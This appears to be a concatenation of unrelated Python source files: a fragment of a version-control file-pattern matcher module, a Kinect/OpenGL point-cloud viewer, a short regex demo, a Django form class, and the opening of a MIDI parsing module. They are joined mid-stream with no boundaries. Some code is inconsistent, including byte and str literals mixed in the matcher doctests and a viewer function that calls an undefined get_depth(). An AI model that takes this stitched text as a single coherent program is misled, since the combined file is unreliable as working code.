    """Match only files matched by both of two matchers.

    Non-matching attributes (root, cwd, bad, traversedir) come from the
    first matcher.
    """

    def __init__(self, m1, m2):
        super(intersectionmatcher, self).__init__(m1._root, m1._cwd)
        self._m1 = m1
        self._m2 = m2
        self.bad = m1.bad
        self.traversedir = m1.traversedir

    @propertycache
    def _files(self):
        if not self.isexact():
            # When neither side is exact we can't intersect the file
            # sets, because files() entries are not necessarily files.
            # E.g. intersecting "-I glob:foo.txt" with "path:dir2" must
            # keep "dir2" in the set.
            return self._m1.files() + self._m2.files()
        exact, other = self._m1, self._m2
        if not exact.isexact():
            exact, other = other, exact
        return [f for f in exact.files() if other(f)]

    def matchfn(self, f):
        return self._m1(f) and self._m2(f)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        visit1 = self._m1.visitdir(dir)
        if visit1 == "all":
            return self._m2.visitdir(dir)
        # bool(): visit1=True combined with visit2="all" must not be "all".
        return bool(visit1 and self._m2.visitdir(dir))

    def always(self):
        return self._m1.always() and self._m2.always()

    def isexact(self):
        return self._m1.isexact() or self._m2.isexact()

    def __repr__(self):
        return "<intersectionmatcher m1=%r, m2=%r>" % (self._m1, self._m2)


class subdirmatcher(basematcher):
    """Adapt a matcher so it applies inside one subdirectory only.

    Paths are remapped on the way in and out as needed:

    >>> from . import pycompat
    >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
    >>> m2 = subdirmatcher(b'sub', m1)
    >>> bool(m2(b'a.txt'))
    False
    >>> bool(m2(b'b.txt'))
    True
    >>> bool(m2.matchfn(b'a.txt'))
    False
    >>> bool(m2.matchfn(b'b.txt'))
    True
    >>> m2.files()
    ['b.txt']
    >>> m2.exact(b'b.txt')
    True
    >>> util.pconvert(m2.rel(b'b.txt'))
    'sub/b.txt'
    >>> def bad(f, msg):
    ...     print(b"%s: %s" % (f, msg))
    >>> m1.bad = bad
    >>> m2.bad(b'x.txt', b'No such file')
    sub/x.txt: No such file
    >>> m2.abs(b'c.txt')
    'sub/c.txt'
    """

    def __init__(self, path, matcher):
        super(subdirmatcher, self).__init__(matcher._root, matcher._cwd)
        self._path = path
        self._matcher = matcher
        self._always = matcher.always()

        prefix = path + "/"
        self._files = [f[len(prefix) :] for f in matcher._files if f.startswith(prefix)]

        # If the parent repo had a path to this subrepo and the wrapped
        # matcher is a prefix matcher, this submatcher always matches.
        if matcher.prefix():
            self._always = any(f == path for f in matcher._files)

    def bad(self, f, msg):
        self._matcher.bad(self._path + "/" + f, msg)

    def abs(self, f):
        return self._matcher.abs(self._path + "/" + f)

    def rel(self, f):
        return self._matcher.rel(self._path + "/" + f)

    def uipath(self, f):
        return self._matcher.uipath(self._path + "/" + f)

    def matchfn(self, f):
        # The superclass's constructor loses information needed to build
        # an accurate matching function for the subdirectory, so matchfn()
        # and visitdir() delegate to the original matcher with the
        # subdirectory path prepended.
        return self._matcher.matchfn(self._path + "/" + f)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if dir == "":
            full = self._path
        else:
            full = self._path + "/" + dir
        return self._matcher.visitdir(full)

    def always(self):
        return self._always

    def prefix(self):
        return self._matcher.prefix() and not self._always

    def __repr__(self):
        return "<subdirmatcher path=%r, matcher=%r>" % (self._path, self._matcher)


class unionmatcher(basematcher):
    """Match anything matched by at least one of several matchers.

    The non-matching attributes (root, cwd, bad, traversedir) are taken
    from the first matcher.
    """

    def __init__(self, matchers):
        first = matchers[0]
        super(unionmatcher, self).__init__(first._root, first._cwd)
        self.traversedir = first.traversedir
        self._matchers = matchers

    def matchfn(self, f):
        return any(m(f) for m in self._matchers)

    def visitdir(self, dir):
        result = False
        for m in self._matchers:
            v = m.visitdir(dir)
            if v == "all":
                # One matcher wants everything below here; no need to ask
                # the rest.
                return v
            result |= v
        return result

    def __repr__(self):
        return "<unionmatcher matchers=%r>" % self._matchers


class xormatcher(basematcher):
    """A matcher that is the xor of two matchers i.e. match returns true if there's at least
    one false and one true.

    The non-matching-attributes (root, cwd, bad, traversedir) are
    taken from the first matcher.
    """

    def __init__(self, m1, m2):
        super(xormatcher, self).__init__(m1._root, m1._cwd)
        self.traversedir = m1.traversedir
        self.m1 = m1
        self.m2 = m2

    def matchfn(self, f):
        # bool() so the xor operates on truthiness rather than raw values.
        return bool(self.m1(f)) ^ bool(self.m2(f))

    def visitdir(self, dir):
        m1dir = self.m1.visitdir(dir)
        m2dir = self.m2.visitdir(dir)

        # if both matchers return "all" then we know for sure we don't need
        # to visit this directory. Same if all matchers return False. In all
        # other case we have to visit a directory.
        if m1dir == "all" and m2dir == "all":
            return False
        if not m1dir and not m2dir:
            return False
        return True

    def __repr__(self):
        # Fixed: this class stores m1/m2, not a _matchers list; the old
        # "%r % self._matchers" raised AttributeError.
        return "<xormatcher m1=%r, m2=%r>" % (self.m1, self.m2)


class recursivematcher(basematcher):
    """Make a matcher recursive: if "a/b/c" matches, "a/b/c/**" matches too.

    Intended for hgignore use only.  Other matchers would additionally
    want "visitdir" and "matchfn" to take parent directories into
    consideration.
    """

    def __init__(self, matcher):
        self._matcher = matcher

    def matchfn(self, f):
        m = self._matcher
        if m(f):
            return True
        # Also match when any ancestor directory of f matches.
        return any(m(parent) for parent in util.dirs((f,)))

    def visitdir(self, dir):
        if self(dir):
            return "all"
        return self._matcher.visitdir(dir)

    def __repr__(self):
        return "<recursivematcher %r>" % self._matcher


def patkind(pattern, default=None):
    """Return the kind of 'kind:pat' when the kind is known, else *default*."""
    kind, _pat = _patsplit(pattern, default)
    return kind


def _patsplit(pattern, default):
    """Split 'kind:pat' into (kind, pat).

    Strings without a recognized kind prefix yield (*default*, pattern).
    """
    kind, sep, rest = pattern.partition(":")
    if sep and kind in allpatternkinds:
        return kind, rest
    return default, pattern


def _globre(pat):
    r"""Convert an extended glob string to a regexp string.

    >>> from . import pycompat
    >>> def bprint(s):
    ...     print(s)
    >>> bprint(_globre(br'?'))
    .
    >>> bprint(_globre(br'*'))
    [^/]*
    >>> bprint(_globre(br'**'))
    .*
    >>> bprint(_globre(br'**/a'))
    (?:.*/)?a
    >>> bprint(_globre(br'a/**/b'))
    a/(?:.*/)?b
    >>> bprint(_globre(br'[a*?!^][^b][!c]'))
    [a*?!^][\^b][^c]
    >>> bprint(_globre(br'{a,b}'))
    (?:a|b)
    >>> bprint(_globre(br'.\*\?'))
    \.\*\?
    """
    i, n = 0, len(pat)
    res = ""  # regexp built so far
    group = 0  # depth of currently open "{...}" alternation groups
    escape = util.re.escape

    def peek():
        # Next character, or False at end of input.
        return i < n and pat[i : i + 1]

    while i < n:
        c = pat[i : i + 1]
        i += 1
        if c not in "*?[{},\\":
            # Ordinary character: escape any regexp metacharacters.
            res += escape(c)
        elif c == "*":
            if peek() == "*":
                i += 1
                if peek() == "/":
                    # "**/" matches any (possibly empty) directory prefix.
                    i += 1
                    res += "(?:.*/)?"
                else:
                    # "**" matches anything, including "/".
                    res += ".*"
            else:
                # Plain "*" matches anything except the path separator.
                res += "[^/]*"
        elif c == "?":
            res += "."
        elif c == "[":
            # Character class: scan for the closing "]", allowing "!" or
            # "]" as the first member.
            j = i
            if j < n and pat[j : j + 1] in "!]":
                j += 1
            while j < n and pat[j : j + 1] != "]":
                j += 1
            if j >= n:
                # Unterminated class: treat "[" as a literal.
                res += "\\["
            else:
                stuff = pat[i:j].replace("\\", "\\\\")
                i = j + 1
                if stuff[0:1] == "!":
                    # Glob negation "[!...]" becomes regexp "[^...]".
                    stuff = "^" + stuff[1:]
                elif stuff[0:1] == "^":
                    # A literal leading "^" must be escaped in regexp.
                    stuff = "\\" + stuff
                res = "%s[%s]" % (res, stuff)
        elif c == "{":
            # "{a,b}" alternation opens a non-capturing group.
            group += 1
            res += "(?:"
        elif c == "}" and group:
            res += ")"
            group -= 1
        elif c == "," and group:
            res += "|"
        elif c == "\\":
            # Backslash escapes the following character, if any.
            p = peek()
            if p:
                i += 1
                res += escape(p)
            else:
                res += escape(c)
        else:
            # "}" or "," outside a group are literal characters.
            res += escape(c)
    return res


def _regex(kind, pat, globsuffix):
    """Convert one (normalized) kind/pattern pair into a regexp string.

    ``globsuffix`` is appended to the regexp built for glob kinds.
    """
    if not pat and kind in ("glob", "relpath"):
        return ""
    if kind == "re":
        return pat
    if kind in ("path", "relpath"):
        return "" if pat == "." else util.re.escape(pat) + "(?:/|$)"
    if kind == "rootfilesin":
        # Pattern names a directory; anything after it must be a single
        # non-directory component.
        escaped = "" if pat == "." else util.re.escape(pat) + "/"
        return escaped + "[^/]+$"
    if kind == "relglob":
        return "(?:|.*/)" + _globre(pat) + globsuffix
    if kind == "relre":
        return pat if pat.startswith("^") else ".*" + pat
    return _globre(pat) + globsuffix


def _buildmatch(ctx, kindpats, globsuffix, root):
    """Build (regexp string, match function) for the given kindpats.

    ``globsuffix`` is appended to the regexp built for glob patterns.
    """
    matchers = []

    subincludes, kindpats = _expandsubinclude(kindpats, root)
    if subincludes:
        submatchers = {}

        def matchsubinclude(f):
            # Lazily build and cache one matcher per subinclude prefix.
            for prefix, matcherargs in subincludes:
                if not f.startswith(prefix):
                    continue
                mf = submatchers.get(prefix)
                if mf is None:
                    mf = match(*matcherargs)
                    submatchers[prefix] = mf
                if mf(f[len(prefix) :]):
                    return True
            return False

        matchers.append(matchsubinclude)

    fset, kindpats = _expandsets(kindpats, ctx)
    if fset:
        matchers.append(fset.__contains__)

    regex = ""
    if kindpats:
        regex, mf = _buildregexmatch(kindpats, globsuffix)
        matchers.append(mf)

    if len(matchers) == 1:
        return regex, matchers[0]
    return regex, lambda f: any(mf(f) for mf in matchers)


def _buildregexmatch(kindpats, globsuffix):
    """Build a match function from a list of kinds and kindpats,
    return regexp string and a matcher function."""
    try:
        # Join all patterns into one alternation: compiling a single
        # regex is much faster than testing each pattern individually.
        regex = "(?:%s)" % "|".join(
            [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
        )
        if len(regex) > 20000:
            # Preemptively trip the splitting path below for huge regexes.
            raise OverflowError
        return regex, _rematcher(regex)
    except OverflowError:
        # We're using a Python with a tiny regex engine and we
        # made it explode, so we'll divide the pattern list in two
        # until it works
        l = len(kindpats)
        if l < 2:
            raise
        regexa, a = _buildregexmatch(kindpats[: l // 2], globsuffix)
        regexb, b = _buildregexmatch(kindpats[l // 2 :], globsuffix)
        # NOTE: the full (oversized) regex string is returned alongside
        # the split matcher; the string itself is informational only here.
        return regex, lambda s: a(s) or b(s)
    except re.error:
        # Recompile each pattern on its own to pinpoint the offender and
        # report it with its source, if any.
        for k, p, s in kindpats:
            try:
                _rematcher("(?:%s)" % _regex(k, p, globsuffix))
            except re.error:
                if s:
                    raise error.Abort(_("%s: invalid pattern (%s): %s") % (s, k, p))
                else:
                    raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
        raise error.Abort(_("invalid pattern"))


def _patternrootsanddirs(kindpats):
    """Returns roots and directories corresponding to each pattern.

    This calculates the roots and directories exactly matching the patterns and
    returns a tuple of (roots, dirs) for each. It does not return other
    directories which may also need to be considered, like the parent
    directories.
    """
    r = []
    d = []
    for kind, pat, source in kindpats:
        if kind == "glob":  # find the non-glob prefix
            root = []
            for p in pat.split("/"):
                if "[" in p or "{" in p or "*" in p or "?" in p:
                    break
                root.append(p)
            r.append("/".join(root))
        elif kind in ("relpath", "path"):
            if pat == ".":
                pat = ""
            r.append(pat)
        elif kind in ("rootfilesin",):
            if pat == ".":
                pat = ""
            d.append(pat)
        else:  # relglob, re, relre
            r.append("")
    return r, d


def _roots(kindpats):
    """Return the root directories matched recursively by the patterns."""
    roots, _dirs = _patternrootsanddirs(kindpats)
    return roots


def _rootsanddirs(kindpats):
    """Return recursive roots and exact directories for the patterns.

    Roots are matched recursively; exact directories are matched
    non-recursively.  Unlike _patternrootsanddirs(), the result also
    includes implied directories, such as the parents of every root.

    >>> _rootsanddirs(
    ...     [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
    ...      (b'glob', b'g*', b'')])
    (['g/h', 'g/h', ''], ['', 'g'])
    >>> _rootsanddirs(
    ...     [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
    ([], ['g/h', '', '', 'g'])
    >>> _rootsanddirs(
    ...     [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
    ...      (b'path', b'', b'')])
    (['r', 'p/p', ''], ['', 'p'])
    >>> _rootsanddirs(
    ...     [(b'relglob', b'rg*', b''), (b're', b're/', b''),
    ...      (b'relre', b'rr', b'')])
    (['', '', ''], [''])
    """
    roots, dirs = _patternrootsanddirs(kindpats)

    # Parents must be scanned non-recursively to reach the roots and the
    # other exact directories, so append them as exact directories.
    dirs.extend(sorted(util.dirs(dirs)))
    dirs.extend(sorted(util.dirs(roots)))

    return roots, dirs


def _explicitfiles(kindpats):
    """Return the potential explicit filenames from the patterns.

    >>> _explicitfiles([(b'path', b'foo/bar', b'')])
    ['foo/bar']
    >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
    []
    """
    # Drop pattern kinds that can only name directories, never files.
    filable = [kp for kp in kindpats if kp[0] != "rootfilesin"]
    return _roots(filable)


def _prefix(kindpats):
    """Whether all the patterns match a prefix (i.e. recursively)"""
    for kind, pat, source in kindpats:
        if kind not in ("path", "relpath"):
            return False
    return True


_commentre = None


def readpatternfile(filepath, warn, sourceinfo=False):
    """parse a pattern file, returning a list of
    patterns. These patterns should be given to compile()
    to be validated and converted into a match function.

    trailing white space is dropped.
    the escape character is backslash.
    comments start with #.
    empty lines are skipped.

    lines can be of the following formats:

    syntax: regexp # defaults following lines to non-rooted regexps
    syntax: glob   # defaults following lines to non-rooted globs
    re:pattern     # non-rooted regular expression
    glob:pattern   # non-rooted glob
    pattern        # pattern of the current default type

    if sourceinfo is set, returns a list of tuples:
    (pattern, lineno, originalline). This is useful to debug ignore patterns.
    """

    # Maps a "syntax: X" name to the kind prefix applied to later lines.
    syntaxes = {
        "re": "relre:",
        "regexp": "relre:",
        "glob": "relglob:",
        "include": "include",
        "subinclude": "subinclude",
    }
    syntax = "relre:"  # default until a "syntax:" line changes it
    patterns = []

    fp = open(filepath, "rb")
    for lineno, line in enumerate(util.iterfile(fp), start=1):
        if "#" in line:
            global _commentre
            if not _commentre:
                # Compile once and cache at module level.
                _commentre = util.re.compile(br"((?:^|[^\\])(?:\\\\)*)#.*")
            # remove comments prefixed by an even number of escapes
            m = _commentre.search(line)
            if m:
                line = line[: m.end(1)]
            # fixup properly escaped comments that survived the above
            line = line.replace("\\#", "#")
        line = line.rstrip()
        if not line:
            continue

        if line.startswith("syntax:"):
            # Switch the default kind for all following lines.
            s = line[7:].strip()
            try:
                syntax = syntaxes[s]
            except KeyError:
                if warn:
                    warn(_("%s: ignoring invalid syntax '%s'\n") % (filepath, s))
            continue

        # A per-line "kind:" prefix overrides the current default syntax.
        linesyntax = syntax
        for s, rels in pycompat.iteritems(syntaxes):
            if line.startswith(rels):
                linesyntax = rels
                line = line[len(rels) :]
                break
            elif line.startswith(s + ":"):
                linesyntax = rels
                line = line[len(s) + 1 :]
                break
        if sourceinfo:
            patterns.append((linesyntax + line, lineno, line))
        else:
            patterns.append(linesyntax + line)
    fp.close()
    return patterns


# Module-level switch: when True, pattern/include matchers try to rewrite
# themselves into treematchers (see patternmatcher/includematcher).
_usetreematcher = True


def init(ui):
    """Load the 'experimental.treematcher' config into the module switch."""
    global _usetreematcher
    _usetreematcher = ui.configbool("experimental", "treematcher")

import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
import time
import freenect

import calibkinect
import pykinectwindow as wxwindow



# I probably need more help with these!
# GL_TEXTURE_RECTANGLE is missing from some PyOpenGL builds; fall back to
# the older ARB extension name.  Catch NameError specifically — the bare
# `except:` previously used would also have hidden unrelated failures.
try:
  TEXTURE_TARGET = GL_TEXTURE_RECTANGLE
except NameError:
  TEXTURE_TARGET = GL_TEXTURE_RECTANGLE_ARB


# Create the window only once so re-running the script in the same
# interpreter session reuses it.
if 'win' not in globals():
  win = wxwindow.Window(size=(640, 480))

def refresh():
  """Request a repaint of the viewer window."""
  # Removed a leftover `print type(win)` debug statement that spammed the
  # console on every refresh.
  win.Refresh()

# One-time initialization of the interactive view state; preserved across
# re-runs of the script in the same interpreter session.  Uses the
# idiomatic `not in` instead of `not ... in`.
if 'rotangles' not in globals(): rotangles = [0, 0]    # view rotation (x, y)
if 'zoomdist' not in globals(): zoomdist = 1           # zoom scale factor
if 'projpts' not in globals(): projpts = (None, None)  # (xyz, uv) point cloud
if 'rgb' not in globals(): rgb = None                  # latest RGB frame

def create_texture():
  """Allocate the global 640x480 RGB texture that receives camera frames.

  Called lazily from on_draw(), so a GL context exists by then.
  """
  global rgbtex
  rgbtex = glGenTextures(1)
  glBindTexture(TEXTURE_TARGET, rgbtex)
  glTexImage2D(TEXTURE_TARGET,0,GL_RGB,640,480,0,GL_RGB,GL_UNSIGNED_BYTE,None)


# Last mouse position while dragging, or None when the button is up.
if not '_mpos' in globals(): _mpos = None
@win.eventx
def EVT_LEFT_DOWN(event):
  # Begin a drag: remember where the button went down.
  global _mpos
  _mpos = event.Position
  
@win.eventx
def EVT_LEFT_UP(event):
  # End the drag.
  global _mpos
  _mpos = None
  
@win.eventx
def EVT_MOTION(event):
  # Drag with the left button to orbit the view: accumulate the mouse
  # delta into the global rotation angles and repaint.
  global _mpos
  if event.LeftIsDown():
    if _mpos:
      (x,y),(mx,my) = event.Position,_mpos
      rotangles[0] += y-my
      rotangles[1] += x-mx
      refresh()    
    _mpos = event.Position


@win.eventx
def EVT_MOUSEWHEEL(event):
  # Wheel zooms: each notch scales the zoom distance geometrically.
  global zoomdist
  dy = event.WheelRotation
  zoomdist *= np.power(0.95, -dy)
  refresh()
  

clearcolor = [0,0,0,0]  # RGBA background; mutated by playcolors()
@win.event
def on_draw():  
  """Render the current point cloud (projpts) textured with the RGB frame."""
  if not 'rgbtex' in globals():
    create_texture()

  xyz, uv = projpts
  if xyz is None: return

  if not rgb is None:
    # Brighten the camera image, then upload it into the texture.
    rgb_ = (rgb.astype(np.float32) * 4 + 70).clip(0,255).astype(np.uint8)
    glBindTexture(TEXTURE_TARGET, rgbtex)
    glTexSubImage2D(TEXTURE_TARGET, 0, 0, 0, 640, 480, GL_RGB, GL_UNSIGNED_BYTE, rgb_);

  glClearColor(*clearcolor)
  glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
  glEnable(GL_DEPTH_TEST)

  # flush that stack in case it's broken from earlier
  glPushMatrix()

  glMatrixMode(GL_PROJECTION)
  glLoadIdentity()
  gluPerspective(60, 4/3., 0.3, 200)

  glMatrixMode(GL_MODELVIEW)
  glLoadIdentity()

  def mouse_rotate(xAngle, yAngle, zAngle):
    # Rotate about the x, y, and z axes in that order.
    glRotatef(xAngle, 1.0, 0.0, 0.0);
    glRotatef(yAngle, 0.0, 1.0, 0.0);
    glRotatef(zAngle, 0.0, 0.0, 1.0);
  # Apply interactive zoom and the mouse-driven rotation.
  glScale(zoomdist,zoomdist,1)
  glTranslate(0, 0,-3.5)
  mouse_rotate(rotangles[0], rotangles[1], 0);
  glTranslate(0,0,1.5)
  #glTranslate(0, 0,-1)

  # Draw some axes
  if 0:
    glBegin(GL_LINES)
    glColor3f(1,0,0); glVertex3f(0,0,0); glVertex3f(1,0,0)
    glColor3f(0,1,0); glVertex3f(0,0,0); glVertex3f(0,1,0)
    glColor3f(0,0,1); glVertex3f(0,0,0); glVertex3f(0,0,1)
    glEnd()

  # We can either project the points ourselves, or embed it in the opengl matrix
  if 0:
    # (disabled) project raw depth samples via the calibration matrices
    dec = 4
    v,u = mgrid[:480,:640].astype(np.uint16)
    points = np.vstack((u[::dec,::dec].flatten(),
                        v[::dec,::dec].flatten(),
                        depth[::dec,::dec].flatten())).transpose()
    points = points[points[:,2]<2047,:]
    
    glMatrixMode(GL_TEXTURE)
    glLoadIdentity()
    glMultMatrixf(calibkinect.uv_matrix().transpose())
    glMultMatrixf(calibkinect.xyz_matrix().transpose())
    glTexCoordPointers(np.array(points))
    
    glMatrixMode(GL_MODELVIEW)
    glPushMatrix()
    glMultMatrixf(calibkinect.xyz_matrix().transpose())
    glVertexPointers(np.array(points))
  else:
    # Points are already projected (see update()); feed them directly.
    glMatrixMode(GL_TEXTURE)
    glLoadIdentity()
    glMatrixMode(GL_MODELVIEW)
    glPushMatrix()
    glVertexPointerf(xyz)
    glTexCoordPointerf(uv)

  # Draw the points
  glPointSize(2)
  glEnableClientState(GL_VERTEX_ARRAY)
  glEnableClientState(GL_TEXTURE_COORD_ARRAY)
  glEnable(TEXTURE_TARGET)
  glColor3f(1,1,1)
  glDrawElementsui(GL_POINTS, np.array(range(xyz.shape[0])))
  glDisableClientState(GL_VERTEX_ARRAY)
  glDisableClientState(GL_TEXTURE_COORD_ARRAY)
  glDisable(TEXTURE_TARGET)
  glPopMatrix()

  #
  if 0:
      # (disabled) highlight the points with z above a threshold
      inds = np.nonzero(xyz[:,2]>-0.55)
      glPointSize(10)
      glColor3f(0,1,1)
      glEnableClientState(GL_VERTEX_ARRAY)
      glDrawElementsui(GL_POINTS, np.array(inds))
      glDisableClientState(GL_VERTEX_ARRAY)

  if 0:
      # Draw only the points in the near plane
      glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
      glEnable(GL_BLEND)
      glColor(0.9,0.9,1.0,0.8)
      glPushMatrix()
      glTranslate(0,0,-0.55)
      glScale(0.6,0.6,1)
      glBegin(GL_QUADS)
      glVertex3f(-1,-1,0); glVertex3f( 1,-1,0);
      glVertex3f( 1, 1,0); glVertex3f(-1, 1,0);
      glEnd()
      glPopMatrix()
      glDisable(GL_BLEND)

  glPopMatrix()


# A silly loop that shows you can busy the ipython thread while opengl runs
def playcolors():
  """Cycle the clear color randomly forever (runs until interrupted)."""
  global clearcolor
  while True:
    clearcolor = [np.random.random(), 0, 0, 0]
    time.sleep(0.1)
    refresh()

# Update the point cloud from the shell or from a background thread!

def update(dt=0):
  """Grab one depth+RGB frame from the Kinect and rebuild the point cloud.

  dt is unused; presumably kept for timer-callback compatibility — TODO
  confirm against callers.
  """
  global projpts, rgb, depth
  depth,_ = freenect.sync_get_depth()
  rgb,_ = freenect.sync_get_video()
  q = depth
  X,Y = np.meshgrid(range(640),range(480))
  # YOU CAN CHANGE THIS AND RERUN THE PROGRAM!
  # Point cloud downsampling
  d = 4
  projpts = calibkinect.depth2xyzuv(q[::d,::d],X[::d,::d],Y[::d,::d])
  refresh()
  
def update_join():
  '''Start background updating and block until the worker thread exits;
  any interruption while waiting (notably Ctrl-C / KeyboardInterrupt)
  turns updating back off.'''
  update_on()
  try:
    _thread.join()
  except:
    # bare except is deliberate: KeyboardInterrupt does not derive from
    # Exception, and it must also stop the update loop
    update_off()
  
def update_on():
  '''Launch the background capture thread; no-op if one is already running.'''
  global _updating, _thread
  if '_updating' not in globals():
    _updating = False
  if _updating:
    return

  _updating = True
  from threading import Thread

  def _worker():
    # keep grabbing frames until update_off() clears the flag
    while _updating:
      update()

  _thread = Thread(target=_worker)
  _thread.start()
  
def update_off():
  '''Signal the background capture thread to stop after its current frame.'''
  global _updating
  _updating = False
  
  
# Get frames in a loop and display with opencv
def loopcv():
  '''Continuously fetch depth frames and display them in an OpenCV window.'''
  import cv
  while True:
    cv.ShowImage('hi', get_depth().astype(np.uint8))
    cv.WaitKey(10)


# Perform one synchronous capture/refresh at import time; uncomment
# update_on() below to stream continuously in a background thread instead.
update() 
#update_on()





import re

# Demo: compile a pattern and inspect the compiled-pattern attributes.
# NOTE: converted from Python 2 print statements to print() calls; the
# rest of this file (b'' literals, print(...) calls) is Python 3 syntax,
# under which the old statements would not even parse.
p = re.compile(r'(\w+) (\w+)(?P<sign>.*)', re.DOTALL)

print(re.DOTALL)
print("p.pattern:", p.pattern)
print("p.flags:", p.flags)
print("p.groups:", p.groups)
print("p.groupindex:", p.groupindex)



from models import Connection
from django import forms

class ConnectionForm(forms.ModelForm):
    '''
    ModelForm for :class:`Connection`.

    Excludes ``d_object_id`` so that field is assigned in code rather
    than edited by the user.
    '''
    class Meta:
        model = Connection
        exclude = ('d_object_id',)

# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines,too-complex,too-many-branches
# pylint: disable=too-many-statements,arguments-differ
# needs refactoring, but I don't have the energy for anything
# more than a superficial cleanup.
#-------------------------------------------------------------------------------
# Name:         midi/__init__.py
# Purpose:      Access to MIDI library / music21 classes for dealing with midi data
#
# Authors:      Christopher Ariza
#               Michael Scott Cuthbert
#               (Will Ware -- see docs)
#
# Copyright:    Copyright © 2011-2013 Michael Scott Cuthbert and the music21 Project
#               Some parts of this module are in the Public Domain, see details.
# License:      LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Objects and tools for processing MIDI data.  Converts from MIDI files to
:class:`~MidiEvent`, :class:`~MidiTrack`, and
:class:`~MidiFile` objects, and vice-versa.
This module uses routines from Will Ware's public domain midi.py library from 2001;
see http://groups.google.com/group/alt.sources/msg/0c5fc523e050c35e
'''
import struct
import sys
import unicodedata # @UnresolvedImport

# good midi reference:
# http://www.sonicspot.com/guide/midifiles.html

def is_num(usr_data):
    '''
    Check whether `usr_data` behaves like a number (float, int, long,
    Decimal); return a boolean.

    Unlike `isinstance(usr_data, Number)`, this rejects `True` and
    `False`.  It works by adding 0 to the candidate, so any type that
    supports scalar addition qualifies.

    >>> is_num(3.0)
    True
    >>> is_num(3)
    True
    >>> is_num('three')
    False
    >>> is_num([2, 3, 4])
    False

    True and False are NOT numbers:

    >>> is_num(True)
    False
    >>> is_num(False)
    False
    >>> is_num(None)
    False

    :rtype: bool
    '''
    if usr_data is True or usr_data is False:
        return False
    try:
        usr_data + 0  # raises for anything without scalar addition
    except Exception: # pylint: disable=broad-except
        return False
    return True

# pylint: disable=missing-docstring
#-------------------------------------------------------------------------------
class EnumerationException(Exception):
    '''Raised when an Enumeration is built from invalid or duplicate entries.'''

class MidiException(Exception):
    '''Raised for malformed MIDI data or unrepresentable MIDI values.'''

#-------------------------------------------------------------------------------

def char_to_binary(char):
    '''
    Convert a char into its binary representation. Useful for debugging.

    >>> char_to_binary('a')
    '01100001'

    Values are zero-padded on the left to at least 8 bits:

    >>> char_to_binary('\\x02')
    '00000010'
    '''
    # format() does the manual shift-and-collect loop of the old
    # implementation in one call: minimum 8 digits, zero-padded, and
    # (like the original) wider than 8 digits for ord(char) > 255.
    return format(ord(char), '08b')


def ints_to_hex_string(int_list):
    '''
    Convert a list of integers into a hex string (bytes), suitable for
    testing MIDI encoding.

    >>> # note on, middle c, 120 velocity
    >>> ints_to_hex_string([144, 60, 120])
    b'\\x90<x'
    '''
    # note off are 128 to 143
    # note on messages are decimal 144 to 159
    # Pack all values with one struct call instead of building the
    # bytestring by repeated concatenation (which is quadratic).
    # ">B" semantics are preserved: every value must fit an unsigned
    # byte (0-255) or struct.error is raised, exactly as before.
    return struct.pack('>%dB' % len(int_list), *int_list)

def get_number(midi_str, length):
    '''
    Return the big-endian integer value of the first `length` bytes of an
    8-bit string or (PY3) bytes object, together with the remainder of
    the string/bytes.

    If `midi_str` is itself a number, instead split it into its low
    `8 * length` bits and the remaining high bits.
    Note that MIDI uses big-endian for everything.

    >>> get_number('test', 0)
    (0, 'test')
    >>> get_number('test', 2)
    (29797, 'st')
    >>> get_number('test', 4)
    (1952805748, '')
    '''
    if is_num(midi_str):
        # numeric input: peel off the low 8*length bits
        shift = 8 * length
        low_bits = midi_str - ((midi_str >> shift) << shift)
        return low_bits, midi_str - low_bits
    value = 0
    for idx in range(length):
        unit = midi_str[idx]
        # bytes indexing yields ints on PY3; str indexing yields chars
        value = (value << 8) + (unit if is_num(unit) else ord(unit))
    return value, midi_str[length:]

def get_variable_length_number(midi_str):
    r'''
    Given a string of data, strip off the first character, or all high-byte
    characters terminating with one whose ord() function is < 0x80.  Thus a
    variable number of bytes might be read.

    After finding the appropriate termination,
    return the remaining string.
    This is necessary as DeltaTime times are given with variable size,
    and thus may be of different numbers of characters.
    (The ellipses below are just to make the doctests work on both Python 2 and
    Python 3 (where the output is in bytes).)

    >>> get_variable_length_number('A-u')
    (65, ...'-u')
    >>> get_variable_length_number('-u')
    (45, ...'u')
    >>> get_variable_length_number('u')
    (117, ...'')
    >>> get_variable_length_number('test')
    (116, ...'est')
    >>> get_variable_length_number('E@-E')
    (69, ...'@-E')
    >>> get_variable_length_number('@-E')
    (64, ...'-E')
    >>> get_variable_length_number('-E')
    (45, ...'E')
    >>> get_variable_length_number('E')
    (69, ...'')

    Test that variable length characters work:
    >>> get_variable_length_number(b'\xff\x7f')
    (16383, ...'')
    >>> get_variable_length_number('中xy')
    (210638584, ...'y')

    If no low-byte character is encoded, raises an IndexError
    >>> get_variable_length_number('中国')
    Traceback (most recent call last):
    MidiException: did not find the end of the number!
    '''
    # from http://faydoc.tripod.com/formats/mid.htm
    # This allows the number to be read one byte at a time, and when you see
    # a msb of 0, you know that it was the last (least significant) byte of the number.
    summation = 0
    if isinstance(midi_str, str):
        # normalize to bytes so iteration below yields ints on Python 3
        midi_str = midi_str.encode('utf-8')

    for i, byte in enumerate(midi_str):
        if not is_num(byte):
            # Python 2 str iteration yields 1-char strings; convert
            byte = ord(byte)
        # accumulate 7 data bits per byte, big-endian
        summation = (summation << 7) + (byte & 0x7F)
        if not byte & 0x80:
            # high bit clear marks the final byte of the number
            try:
                return summation, midi_str[i+1:]
            except IndexError:
                break
    raise MidiException('did not find the end of the number!')

def get_numbers_as_list(midi_str):
    '''
    Translate each char into a number, return in a list.
    Used for reading data messages where each byte encodes
    a different discrete value.

    >>> get_numbers_as_list('\\x00\\x00\\x00\\x03')
    [0, 0, 0, 3]
    '''
